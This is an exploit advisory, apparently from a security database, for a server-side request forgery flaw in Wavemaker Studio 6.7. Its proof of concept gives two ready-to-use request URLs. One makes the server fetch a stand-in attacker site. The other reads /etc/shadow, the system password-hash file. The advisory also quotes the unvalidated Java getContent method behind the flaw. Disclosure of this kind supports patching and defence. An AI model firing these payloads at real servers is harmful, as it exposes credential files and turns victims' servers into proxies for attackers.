Wavemaker Studio 6.7 - Server-Side Request Forgery (SSRF)

2018.12.10
dk Gionathan Reale (DK) dk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wavemaker Studio 6.7 - Server-Side Request Forgery (SSRF) # Exploit Author: Gionathan "John" Reale # Google Dork: N/A # Date: 2018-12-10 # Vendor Homepage: http://www.wavemaker.com/ # Affected Version: 6.7> # CVE : N/A # Description # Wavemaker Studio 6.7 contains an exploitable unvaildated parameter allowing an # attacker to pass dangerous content to a victim via a phishing link. The vulnerability # can also be exploited to access sensitive data or to use the server hosting Wavemaker # as a form of HTTP proxy among other things. # Proof Of Concept http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/ http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file:///etc/shadow # Vulnerable Code # /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java # Line 419-430 @ExposeToClient public String getContent(String inUrl) throws IOException { try { String str = getRemoteContent(inUrl); str = str.replace("<head>", "<head><base href='" + inUrl + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>"); return str; } catch (Exception e) { return ""; } }


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top